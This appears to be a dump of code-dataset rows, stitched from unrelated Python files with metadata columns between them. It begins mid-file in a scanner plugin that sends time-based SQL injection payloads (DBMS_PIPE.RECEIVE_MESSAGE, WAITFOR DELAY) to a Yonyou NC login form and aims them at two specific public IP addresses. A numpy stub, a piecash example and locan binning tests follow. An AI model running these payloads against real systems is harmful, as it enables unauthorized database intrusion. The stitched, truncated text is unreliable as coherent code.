'LoginButton=%e7%99%bb%e5%bd%95(Login)¤tDate=2015-09-02&dschoice=aorwpw5ufcw6&hidBack=&languagechoice=simpchn&operType=null&refrence=%e5%8f%82%e7%85%a7(Ref)&timeRef=%e5%8f%82%e7%85%a7(Ref)&UserCodeText=wxbsisqq&UserPassText=wxbsisqq&UserSeleLang=simpchn&UserUnitText=asd%27%29%20AND%208148%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2867%29%7C%7CCHR%2885%29%7C%7CCHR%2876%29%2C5%29%20AND%20%28%271%27%3D%271':'LoginButton=%e7%99%bb%e5%bd%95(Login)¤tDate=2015-09-02&dschoice=aorwpw5ufcw6&hidBack=&languagechoice=simpchn&operType=null&refrence=%e5%8f%82%e7%85%a7(Ref)&timeRef=%e5%8f%82%e7%85%a7(Ref)&UserCodeText=wxbsisqq&UserPassText=wxbsisqq&UserSeleLang=simpchn&UserUnitText=asd%27%29%20AND%208148%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2867%29%7C%7CCHR%2885%29%7C%7CCHR%2876%29%2C1%29%20AND%20%28%271%27%3D%271',
'LoginButton=%e7%99%bb%e5%bd%95(Login)¤tDate=2015-09-02&dschoice=aorwpw5ufcw6&hidBack=&languagechoice=simpchn&operType=null&refrence=%e5%8f%82%e7%85%a7(Ref)&timeRef=%e5%8f%82%e7%85%a7(Ref)&UserCodeText=wxbsisqq&UserPassText=wxbsisqq&UserSeleLang=simpchn&UserUnitText=asd%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--':'LoginButton=%e7%99%bb%e5%bd%95(Login)¤tDate=2015-09-02&dschoice=aorwpw5ufcw6&hidBack=&languagechoice=simpchn&operType=null&refrence=%e5%8f%82%e7%85%a7(Ref)&timeRef=%e5%8f%82%e7%85%a7(Ref)&UserCodeText=wxbsisqq&UserPassText=wxbsisqq&UserSeleLang=simpchn&UserUnitText=asd%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A1%27--'
}
for postdata in postdatas:
t1 = time.time()
code1, head, res1, errcode, _ = curl.curl2(url,postdata)
t2 = time.time()
code2, head, res2, errcode, _ = curl.curl2(url,postdatas[postdata])
t3 = time.time()
if code1==200 and code2 == 200 and (2*t2 - t1 - t3 > 3):
security_hole(url + " :post Injection")
if __name__ == '__main__':
from dummy import *
audit(assign('yongyou_nc', 'http://61.135.227.114/')[1])
audit(assign('yongyou_nc', 'http://101.95.113.130/')[1]) | 76.0625 | 851 | 0.69926 | 371 | 2,434 | 4.539084 | 0.342318 | 0.019002 | 0.028504 | 0.038005 | 0.729216 | 0.700713 | 0.700713 | 0.700713 | 0.700713 | 0.700713 | 0 | 0.163858 | 0.122432 | 2,434 | 32 | 852 | 76.0625 | 0.624532 | 0.042317 | 0 | 0 | 0 | 0.181818 | 0.70222 | 0.658685 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0.090909 | 0.090909 | 0 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
2cacd3ac099a9a692b63bde28cfa56e0872ca82b | 25 | py | Python | python/testData/MockSdkWithBinaryModules/python_stubs/oldnumpy/core/umath.py | adehtiarov/intellij-community | 82826022ae57a7ae5e7f8fe3430f2ea4fc1a8f86 | [
"Apache-2.0"
] | 2 | 2018-12-29T09:53:39.000Z | 2018-12-29T09:53:42.000Z | python/testData/MockSdkWithBinaryModules/python_stubs/oldnumpy/core/umath.py | tnorbye/intellij-community | f01cf262fc196bf4dbb99e20cd937dee3705a7b6 | [
"Apache-2.0"
] | null | null | null | python/testData/MockSdkWithBinaryModules/python_stubs/oldnumpy/core/umath.py | tnorbye/intellij-community | f01cf262fc196bf4dbb99e20cd937dee3705a7b6 | [
"Apache-2.0"
] | null | null | null | def log():
return 1.0 | 12.5 | 14 | 0.56 | 5 | 25 | 2.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 0.28 | 25 | 2 | 14 | 12.5 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
e2f110ca62c190bddaaabb3c870620163646540d | 1,017 | py | Python | examples/simple_book.py | kapinga/piecash | ec30cf469198cccf35f7ba968f889d360cfe1824 | [
"MIT"
] | 223 | 2015-01-12T22:02:53.000Z | 2022-03-03T22:05:42.000Z | examples/simple_book.py | kapinga/piecash | ec30cf469198cccf35f7ba968f889d360cfe1824 | [
"MIT"
] | 158 | 2015-03-16T19:57:29.000Z | 2022-01-31T23:22:57.000Z | examples/simple_book.py | kapinga/piecash | ec30cf469198cccf35f7ba968f889d360cfe1824 | [
"MIT"
] | 84 | 2015-02-06T14:17:17.000Z | 2022-03-14T02:13:50.000Z | from __future__ import print_function
from piecash import create_book
# create by default an in memory sqlite version
with create_book(echo=False) as book:
print("Book is saved:", book.is_saved, end=" ")
print(" ==> book description:", book.root_account.description)
print("changing description...")
book.root_account.description = "hello, book"
print("Book is saved:", book.is_saved, end=" ")
print(" ==> book description:", book.root_account.description)
print("saving...")
book.save()
print("Book is saved:", book.is_saved, end=" ")
print(" ==> book description:", book.root_account.description)
print("changing description...")
book.root_account.description = "nevermind, book"
print("Book is saved:", book.is_saved, end=" ")
print(" ==> book description:", book.root_account.description)
print("cancel...")
book.cancel()
print("Book is saved:", book.is_saved, end=" ")
print(" ==> book description:", book.root_account.description)
| 32.806452 | 66 | 0.672566 | 126 | 1,017 | 5.277778 | 0.246032 | 0.135338 | 0.165414 | 0.273684 | 0.754887 | 0.754887 | 0.754887 | 0.754887 | 0.754887 | 0.754887 | 0 | 0 | 0.169125 | 1,017 | 30 | 67 | 33.9 | 0.786982 | 0.044248 | 0 | 0.571429 | 0 | 0 | 0.283505 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.095238 | 0 | 0.095238 | 0.714286 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
3939092a735662ab4f640101981b68eeb5655262 | 29,111 | py | Python | locan/tests/data/test_aggregate.py | super-resolution/Locan | 94ed7759f7d7ceddee7c7feaabff80010cfedf30 | [
"BSD-3-Clause"
] | 8 | 2021-11-25T20:05:49.000Z | 2022-03-27T17:45:00.000Z | locan/tests/data/test_aggregate.py | super-resolution/Locan | 94ed7759f7d7ceddee7c7feaabff80010cfedf30 | [
"BSD-3-Clause"
] | 4 | 2021-12-15T22:39:20.000Z | 2022-03-11T17:35:34.000Z | locan/tests/data/test_aggregate.py | super-resolution/Locan | 94ed7759f7d7ceddee7c7feaabff80010cfedf30 | [
"BSD-3-Clause"
] | 1 | 2022-03-22T19:53:13.000Z | 2022-03-22T19:53:13.000Z | import boost_histogram as bh
import numpy as np
import pytest
from locan import Bins, histogram
from locan.data.aggregate import (
_bin_edges_to_bin_centers,
_bin_edges_to_bin_size,
_bin_edges_to_bin_size_one_dimension,
_bin_edges_to_n_bins,
_bin_edges_to_n_bins_one_dimension,
_bin_size_to_bin_edges_one_dimension,
_BinsFromBoostHistogramAxis,
_BinsFromEdges,
_BinsFromNumber,
_BinsFromSize,
_indices_to_bin_centers,
_is_1d_array_of_scalar,
_is_1d_array_of_two_scalar,
_is_2d_homogeneous_array,
_is_2d_inhomogeneous_array,
_is_2d_inhomogeneous_array_of_1d_array_of_scalar,
_is_scalar,
_is_single_element,
_n_bins_to_bin_edges_one_dimension,
)
data_scalars = {"1": 1, "()": ()}
data_tuples = {
"((),)": ((),),
"(1,)": (1,),
"(1, 2)": (1, 2),
"(1, 2, 3)": (1, 2, 3),
"((1, 2),)": ((1, 2),),
"((1, 2), (1, 2))": ((1, 2), (1, 2)),
"((1, 2), (1, 2, 3))": ((1, 2), (1, 2, 3)),
"((1, 2), ((1, 2), (1, 2)))": ((1, 2), ((1, 2), (1, 2))),
"(1, (1, 2))": (1, (1, 2)),
}
data_lists = {
"[[]]": [[]],
"[1]": [1],
"[1, 2]": [1, 2],
"[1, 2, 3]": [1, 2, 3],
"[[1, 2]]": [[1, 2]],
"[[1, 2], [1, 2]]": [[1, 2], [1, 2]],
"[[1, 2], [1, 2, 3]]": [[1, 2], [1, 2, 3]],
"[[1, 2], [[1, 2], [1, 2]]]": [[1, 2], [[1, 2], [1, 2]]],
"[1, [1, 2]]": [1, [1, 2]],
}
data_ndarrays = {
"np.array((1))": np.array((1)),
"np.array((1,))": np.array((1,)),
"np.array((1, 2))": np.array((1, 2)),
"np.array([(1, 2)])": np.array([(1, 2)]),
"np.array([(1, 2)], dtype=object)": np.array([(1, 2)], dtype=object),
"np.array([(1, 2), (1, 2, 3)], dtype=object)": np.array(
[(1, 2), (1, 2, 3)], dtype=object
),
}
data_all = {**data_scalars, **data_tuples, **data_lists, **data_ndarrays}
expect_is_scalar = ["1", "np.array((1))"]
expect_is_single_element = ["1", "(1,)", "[1]", "np.array((1))", "np.array((1,))"]
expect_is_1d_array_of_scalar = [
"(1, 2)",
"(1, 2, 3)",
"[1, 2]",
"[1, 2, 3]",
"np.array((1, 2))",
"(1,)",
"[1]",
"np.array((1,))",
]
expect_is_1d_array_of_two_scalar = ["(1, 2)", "[1, 2]", "np.array((1, 2))"]
expect_is_2d_homogeneous_array = [
"((1, 2),)",
"((1, 2), (1, 2))",
"[[1, 2]]",
"[[1, 2], [1, 2]]",
"np.array([(1, 2)])",
]
expect_is_2d_inhomogeneous_array = [
"((1, 2), (1, 2, 3))",
"(1, (1, 2))",
"[[1, 2], [1, 2, 3]]",
"[1, [1, 2]]",
"np.array([(1, 2), (1, 2, 3)], dtype=object)",
]
expect_is_2d_inhomogeneous_array_of_1d_array_of_scalar = [
"((1, 2), (1, 2, 3))",
"[[1, 2], [1, 2, 3]]",
"np.array([(1, 2), (1, 2, 3)], dtype=object)",
]
def test__is_scalar():
for key, value in data_all.items():
if key in expect_is_scalar:
assert _is_scalar(value)
else:
assert not _is_scalar(value)
def test__is_single_element():
for key, value in data_all.items():
if key in expect_is_single_element:
assert _is_single_element(value)
else:
assert not _is_single_element(value)
def test__is_1d_array_of_scalar():
for key, value in data_all.items():
if key in expect_is_1d_array_of_scalar:
assert _is_1d_array_of_scalar(value)
else:
assert not _is_1d_array_of_scalar(value)
def test__is_1d_array_of_two_scalar():
for key, value in data_all.items():
if key in expect_is_1d_array_of_two_scalar:
assert _is_1d_array_of_two_scalar(value)
else:
assert not _is_1d_array_of_two_scalar(value)
def test__is_2d_homogeneous_array():
for key, value in data_all.items():
if key in expect_is_2d_homogeneous_array:
assert _is_2d_homogeneous_array(value)
else:
assert not _is_2d_homogeneous_array(value)
def test__is_2d_inhomogeneous_array():
for key, value in data_all.items():
if key in expect_is_2d_inhomogeneous_array:
assert _is_2d_inhomogeneous_array(value)
else:
assert not _is_2d_inhomogeneous_array(value)
def test__is_2d_inhomogeneous_array_of_1d_array_of_scalar():
for key, value in data_all.items():
if key in expect_is_2d_inhomogeneous_array_of_1d_array_of_scalar:
assert _is_2d_inhomogeneous_array_of_1d_array_of_scalar(value)
else:
assert not _is_2d_inhomogeneous_array_of_1d_array_of_scalar(value)
def test__n_bins_to_bin_edges_one_dimension():
bin_edges = _n_bins_to_bin_edges_one_dimension(10, (10, 20))
assert bin_edges.shape == (11,)
def test__bin_size_to_bin_edges_one_dimension():
bin_edges = _bin_size_to_bin_edges_one_dimension(4, (1, 10), extend_range=None)
isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 5, 9))
bin_edges = _bin_size_to_bin_edges_one_dimension(4, (1, 10), extend_range=True)
isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 5, 9, 13))
bin_edges = _bin_size_to_bin_edges_one_dimension(4, (1, 10), extend_range=False)
isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 5, 9, 10))
bin_edges = _bin_size_to_bin_edges_one_dimension(20, (1, 10), extend_range=None)
isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 10))
bin_edges = _bin_size_to_bin_edges_one_dimension(20, (1, 10), extend_range=True)
isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 21))
bin_edges = _bin_size_to_bin_edges_one_dimension(20, (1, 10), extend_range=False)
isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 10))
bin_edges = _bin_size_to_bin_edges_one_dimension(
(1, 2, 3, 3, 2), (1, 11), extend_range=None
)
isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 2, 4, 7, 10))
bin_edges = _bin_size_to_bin_edges_one_dimension(
(1, 2, 3, 3, 2), (1, 11), extend_range=True
)
isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 2, 4, 7, 10, 12))
bin_edges = _bin_size_to_bin_edges_one_dimension(
(1, 2, 3, 3, 2), (1, 11), extend_range=False
)
isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 2, 4, 7, 10, 11))
bin_edges = _bin_size_to_bin_edges_one_dimension(
(10, 20, 30), (1, 2), extend_range=None
)
isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 2))
bin_edges = _bin_size_to_bin_edges_one_dimension(
(10, 20, 30), (1, 2), extend_range=True
)
isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 11))
bin_edges = _bin_size_to_bin_edges_one_dimension(
(10, 20, 30), (1, 2), extend_range=False
)
isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 2))
with pytest.raises(TypeError):
_bin_size_to_bin_edges_one_dimension(((4,), 2), (0, 10), extend_range=False)
def test__bin_edges_to_n_bins_one_dimension():
n_bins = _bin_edges_to_n_bins_one_dimension((1, 3, 5))
assert n_bins == 2
n_bins = _bin_edges_to_n_bins_one_dimension([1, 2, 4])
assert n_bins == 2
def test__bin_edges_to_n_bins():
n_bins = _bin_edges_to_n_bins([1, 3, 5])
assert n_bins == (2,)
n_bins = _bin_edges_to_n_bins(([1, 3, 5],))
assert n_bins == (2,)
n_bins = _bin_edges_to_n_bins([1, 2, 4])
assert n_bins == (2,)
n_bins = _bin_edges_to_n_bins(((1, 3, 5), (1, 2, 4, 5)))
assert np.array_equal(n_bins, (2, 3))
n_bins = _bin_edges_to_n_bins([[1, 3, 5], [1, 2, 3, 4]])
assert np.array_equal(n_bins, (2, 3))
n_bins = _bin_edges_to_n_bins(np.array([[1, 3, 5], [1, 2, 3]]))
assert np.array_equal(n_bins, (2, 2))
def test__bin_edges_to_bin_size_one_dimension():
bin_size = _bin_edges_to_bin_size_one_dimension((1, 3, 5))
assert bin_size == 2
bin_size = _bin_edges_to_bin_size_one_dimension([1, 2, 4])
assert np.array_equal(bin_size, (1, 2))
bin_size = _bin_edges_to_bin_size_one_dimension([1, 2])
assert bin_size == 1
def test__bin_edges_to_bin_size():
bin_size = _bin_edges_to_bin_size([1, 3, 5])
assert bin_size == (2,)
bin_size = _bin_edges_to_bin_size(([1, 3, 5],))
assert bin_size == (2,)
bin_size = _bin_edges_to_bin_size([1, 2, 4])
assert np.array_equal(bin_size[0], (1, 2))
bin_size = _bin_edges_to_bin_size(((1, 3, 5), (1, 2, 4, 5)))
assert bin_size[0] == 2
assert np.array_equal(bin_size[1], (1, 2, 1))
bin_size = _bin_edges_to_bin_size([[1, 3, 5], [1, 2, 3, 4]])
assert bin_size == (2, 1)
bin_size = _bin_edges_to_bin_size(np.array([[1, 3, 5], [1, 2, 3]]))
assert bin_size == (2, 1)
def test__bin_edges_to_bin_centers():
bin_centers = _bin_edges_to_bin_centers([1, 3, 5])
assert np.array_equal(bin_centers, ((2, 4),))
bin_centers = _bin_edges_to_bin_centers(([1, 3, 5],))
assert np.array_equal(bin_centers, ((2, 4),))
bin_centers = _bin_edges_to_bin_centers(((1, 3, 5), (1, 2, 4, 6)))
expected = ((2, 4), (1.5, 3, 5))
for bc, ex in zip(bin_centers, expected):
assert np.array_equal(bc, ex)
bin_edges = np.array([[0, 1, 2, 4, 8, 9], [0, 1, 4, 8]], dtype=object)
bin_centers = _bin_edges_to_bin_centers(bin_edges)
expected = (np.array([0.5, 1.5, 3.0, 6, 8.5]), np.array([0.5, 2.5, 6]))
for bc, ex in zip(bin_centers, expected):
assert np.array_equal(bc, ex)
def test__indices_to_bin_centers():
indices = 2
bin_edges = np.array([0, 1, 2, 4, 8, 9])
bin_centers = _indices_to_bin_centers(bin_edges, indices)
expected = 3
assert np.array_equal(bin_centers, expected)
indices = np.array([0, 2, 1])
bin_edges = np.array([0, 1, 2, 4, 8, 9])
bin_centers = _indices_to_bin_centers(bin_edges, indices)
expected = np.array([0.5, 3, 1.5])
assert np.array_equal(bin_centers, expected)
indices = np.array([[0, 1], [2, 2], [4, 3]])
bin_edges = np.array([0, 1, 2, 4, 8, 9])
bin_centers = _indices_to_bin_centers(bin_edges, indices)
expected = np.array([[0.5, 1.5], [3, 3], [8.5, 6]])
assert np.array_equal(bin_centers, expected)
indices = np.array([[0, 1], [2, 2], [4, 3]])
bin_edges = np.array([[0, 1, 2, 4, 8, 9], [1, 2, 4, 8, 9]], dtype=object)
bin_centers = _indices_to_bin_centers(bin_edges, indices)
expected = np.array([[0.5, 3], [3, 6], [8.5, 8.5]])
assert np.array_equal(bin_centers, expected)
def test__BinsFromBoostHistogramAxis():
bhaxis = bh.axis.Regular(5, 0, 10)
bins = _BinsFromBoostHistogramAxis(bins=bhaxis)
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (5,)
assert bins.bin_size == ((2, 2, 2, 2, 2),)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
assert np.array_equal(bins.bin_centers[0], np.array([1, 3, 5, 7, 9]))
bhaxes = bh.axis.AxesTuple((bh.axis.Regular(5, 0, 10), bh.axis.Regular(2, 0, 10)))
bins = _BinsFromBoostHistogramAxis(bins=bhaxes)
assert bins.dimension == 2
assert bins.bin_range == ((0.0, 10.0), (0.0, 10.0))
assert bins.n_bins == (5, 2)
assert bins.bin_size == ((2.0, 2.0, 2.0, 2.0, 2.0), (5.0, 5.0))
expected_edges = [np.array([0, 2, 4, 6, 8, 10]), np.array([0, 5, 10])]
for bin_edges, edges in zip(bins.bin_edges, expected_edges):
assert np.array_equal(bin_edges, edges)
expected_centers = [np.array([1, 3, 5, 7, 9]), np.array([2.5, 7.5])]
for bin_centers, expected_cents in zip(bins.bin_centers, expected_centers):
assert np.array_equal(bin_centers, expected_cents)
def test__BinsFromEdges():
bins = _BinsFromEdges(bin_edges=(0, 2, 4))
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 4.0),)
assert bins.n_bins == (2,)
assert bins.bin_size == (2,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4]))
bins = _BinsFromEdges(bin_edges=((0, 2, 4),))
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 4.0),)
assert bins.n_bins == (2,)
assert bins.bin_size == (2,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4]))
bins = _BinsFromEdges(bin_edges=(1, 2, 5))
assert bins.dimension == 1
assert bins.bin_range == ((1, 5),)
assert bins.n_bins == (2,)
assert np.array_equal(bins.bin_size[0], np.array([1, 3]))
assert np.array_equal(bins.bin_edges[0], np.array([1, 2, 5]))
bins = _BinsFromEdges(bin_edges=((0, 2, 4), (1, 2, 5)))
assert bins.dimension == 2
assert bins.bin_range == ((0.0, 4.0), (1.0, 5.0))
assert bins.n_bins == (2, 2)
assert bins.bin_size[0] == 2
assert np.array_equal(bins.bin_size[1], np.array([1, 3]))
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4]))
assert np.array_equal(bins.bin_edges[-1], np.array([1, 2, 5]))
with pytest.raises(TypeError):
_BinsFromEdges(bin_edges=())
with pytest.raises(TypeError):
_BinsFromEdges(bin_edges=[(0, 2, 4), ((0, 2, 4), (0, 2, 4))])
with pytest.raises(TypeError):
_BinsFromEdges(bin_edges=[(0, 2, 4), 2])
def test__BinsFromNumber_():
bins = _BinsFromNumber(n_bins=5, bin_range=(0, 10))
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (5,)
assert bins.bin_size == (2,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
bins = _BinsFromNumber(n_bins=(5,), bin_range=(0, 10))
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (5,)
assert bins.bin_size == (2,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
bins = _BinsFromNumber(n_bins=(2, 5), bin_range=((0, 10), (0, 5)))
assert bins.dimension == 2
assert bins.bin_range == ((0, 10), (0, 5))
assert bins.n_bins == (2, 5)
assert bins.bin_size == (5, 1)
assert np.array_equal(bins.bin_edges[0], np.array([0, 5, 10]))
assert np.array_equal(bins.bin_edges[1], np.array([0, 1, 2, 3, 4, 5]))
bins = _BinsFromNumber(n_bins=2, bin_range=((0, 10), (0, 5)))
assert bins.dimension == 2
assert bins.bin_range == ((0, 10), (0, 5))
assert bins.n_bins == (2, 2)
assert bins.bin_size == (5, 2.5)
assert np.array_equal(bins.bin_edges[0], np.array([0, 5, 10]))
assert np.array_equal(bins.bin_edges[1], np.array([0, 2.5, 5]))
bins = _BinsFromNumber(n_bins=(2, 5, 2), bin_range=(0, 10))
assert bins.dimension == 3
assert bins.bin_range == ((0, 10), (0, 10), (0, 10))
assert bins.n_bins == (2, 5, 2)
assert bins.bin_size == (5, 2, 5)
assert np.array_equal(bins.bin_edges[0], np.array([0, 5, 10]))
assert np.array_equal(bins.bin_edges[1], np.array([0, 2, 4, 6, 8, 10]))
assert np.array_equal(bins.bin_edges[2], np.array([0, 5, 10]))
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=5, bin_range=1)
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=5, bin_range=(0,))
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=5, bin_range=(1, 2, 3))
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=(5, (1, 2)), bin_range=(1, 2, 3))
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=(5,), bin_range=1)
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=(5,), bin_range=(0,))
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=(5,), bin_range=(1, 2, 3))
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=(2,), bin_range=((0, 10), (0, 5)))
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=(2, 5, 2), bin_range=1)
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=(2, 5, 2), bin_range=(0,))
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=(2, 5, 2), bin_range=(1, 2, 3))
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=(5, (1, 2)), bin_range=(1, 2))
def test__BinsFromSize():
bins = _BinsFromSize(bin_size=2, bin_range=(0, 10))
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (5,)
assert bins.bin_size == (2,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
bins = _BinsFromSize(bin_size=(2,), bin_range=(0, 10))
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (5,)
assert bins.bin_size == (2,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
bins = _BinsFromSize(bin_size=((1, 2, 3, 4),), bin_range=(0, 10))
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (4,)
assert np.array_equal(bins.bin_size[0], (1, 2, 3, 4))
assert np.array_equal(bins.bin_edges[0], np.array([0, 1, 3, 6, 10]))
bins = _BinsFromSize(bin_size=3, bin_range=(0, 10), extend_range=False)
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (4,)
assert np.array_equal(bins.bin_size[0], (3.0, 3.0, 3.0, 1.0))
assert np.array_equal(bins.bin_edges[0], np.array([0, 3, 6, 9, 10]))
bins = _BinsFromSize(bin_size=(5, 1), bin_range=((0, 10), (0, 5)))
assert bins.dimension == 2
assert bins.bin_range == ((0, 10), (0, 5))
assert bins.n_bins == (2, 5)
assert bins.bin_size == (5, 1)
assert np.array_equal(bins.bin_edges[0], np.array([0, 5, 10]))
assert np.array_equal(bins.bin_edges[1], np.array([0, 1, 2, 3, 4, 5]))
bins = _BinsFromSize(bin_size=2, bin_range=((0, 10), (0, 5)))
assert bins.dimension == 2
assert bins.bin_range == ((0, 10), (0, 4))
assert bins.n_bins == (5, 2)
assert bins.bin_size == (2, 2)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
assert np.array_equal(bins.bin_edges[1], np.array([0, 2, 4]))
bins = _BinsFromSize(bin_size=(2, 5), bin_range=(0, 10))
assert bins.dimension == 2
assert bins.bin_range == ((0, 10), (0, 10))
assert bins.n_bins == (5, 2)
assert bins.bin_size == (2, 5)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
assert np.array_equal(bins.bin_edges[1], np.array([0, 5, 10]))
bins = _BinsFromSize(bin_size=((1, 2, 3, 4), (1, 2, 3, 1)), bin_range=(0, 10))
assert bins.dimension == 2
assert bins.bin_range == ((0.0, 10.0), (0.0, 7.0))
assert bins.n_bins == (4, 4)
assert np.array_equal(bins.bin_size[0], (1, 2, 3, 4))
assert np.array_equal(bins.bin_size[1], (1, 2, 3, 1))
assert np.array_equal(bins.bin_edges[0], np.array([0, 1, 3, 6, 10]))
assert np.array_equal(bins.bin_edges[1], np.array([0, 1, 3, 6, 7]))
bins = _BinsFromSize(
bin_size=((1, 2, 3, 4), (1, 2, 3, 4)), bin_range=((0, 10), (0, 10))
)
assert bins.dimension == 2
assert bins.bin_range == ((0.0, 10.0), (0.0, 10.0))
assert bins.n_bins == (4, 4)
assert np.array_equal(bins.bin_size[0], (1, 2, 3, 4))
assert np.array_equal(bins.bin_size[1], (1, 2, 3, 4))
assert np.array_equal(bins.bin_edges[0], np.array([0, 1, 3, 6, 10]))
assert np.array_equal(bins.bin_edges[1], np.array([0, 1, 3, 6, 10]))
bins = _BinsFromSize(bin_size=(2, (1, 2, 3, 4)), bin_range=(0, 10))
assert bins.dimension == 2
assert bins.bin_range == ((0.0, 10.0), (0.0, 10.0))
assert bins.n_bins == (5, 4)
assert bins.bin_size[0] == 2
assert np.array_equal(bins.bin_size[1], (1, 2, 3, 4))
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
assert np.array_equal(bins.bin_edges[1], np.array([0, 1, 3, 6, 10]))
bins = _BinsFromSize(bin_size=(2, (1, 2, 3, 4)), bin_range=((0, 10), (0, 20)))
assert bins.dimension == 2
assert bins.bin_range == ((0.0, 10.0), (0.0, 10.0))
assert bins.n_bins == (5, 4)
assert bins.bin_size[0] == 2
assert np.array_equal(bins.bin_size[1], (1, 2, 3, 4))
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
assert np.array_equal(bins.bin_edges[1], np.array([0, 1, 3, 6, 10]))
with pytest.raises(TypeError):
_BinsFromSize(bin_size=5, bin_range=(0,))
with pytest.raises(TypeError):
_BinsFromSize(bin_size=5, bin_range=(1, 2, 3))
with pytest.raises(TypeError):
_BinsFromSize(bin_size=(2, 2, (1, 2, 3, 4)), bin_range=((0, 10), (0, 20)))
with pytest.raises(TypeError):
_BinsFromSize(
bin_size=((1, 2, 3, 4), (1, 2, 3, 4), (1, 2, 3, 4)),
bin_range=((0, 10), (0, 20)),
)
def test_Bins():
bins = Bins(bin_edges=(0, 2, 4))
assert bins.dimension == 1
assert bins.bin_range == ((0, 4),)
assert bins.n_bins == (2,)
assert bins.bin_size == (2,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4]))
assert np.array_equal(bins.bin_centers[0], np.array([1, 3]))
assert bins.is_equally_sized == (True,)
bins = Bins(n_bins=5, bin_range=(0, 10))
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (5,)
assert bins.bin_size == (2,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
assert np.array_equal(bins.bin_centers[0], np.array([1, 3, 5, 7, 9]))
assert bins.is_equally_sized == (True,)
bins = Bins(bin_size=2, bin_range=(0, 10))
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (5,)
assert bins.bin_size == (2,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
